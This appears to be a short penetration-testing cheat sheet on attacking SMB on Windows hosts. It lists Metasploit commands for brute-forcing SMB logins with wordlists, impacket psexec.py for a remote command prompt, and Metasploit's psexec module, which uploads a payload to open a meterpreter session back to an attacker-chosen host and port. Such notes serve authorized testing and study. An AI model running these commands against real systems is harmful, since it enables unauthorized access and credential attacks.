Brute force and Login

Brute force with metasploit

• Use Metasploit smb_login module to brute force SMB

  • The brute force success is based on the user list and password list used.

use auxiliary/scanner/smb/smb_login
set RHOSTS <TARGET_IP>
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
run

Authentication with psExec.py

• Use PsExec.py script for Linux (from the impacket-scripts) to get a command prompt on the target machine, with the Administrator account.

  • Using this technique, no exploit is launched or uploaded on the target system.

  • It is a legitimate authentication with the actual credentials and the use of an official tool (psexec).

psexec.py username@ip address cmd.exe

Authentication with metasploit Psexec module

• Alternatively to the Python script, use Metasploit psexec module to get a meterpreter session on the target system.

  • This technique will upload and run a (malicious) payload on the target. Pay attention to the antivirus!

msfconsole
search psexec
use exploit/windows/smb/psexec
set RHOSTS <target ip>
set SMBUser username
set SMBPass password
set LHOST = your host IP address
set LPORT = port you want 
exploit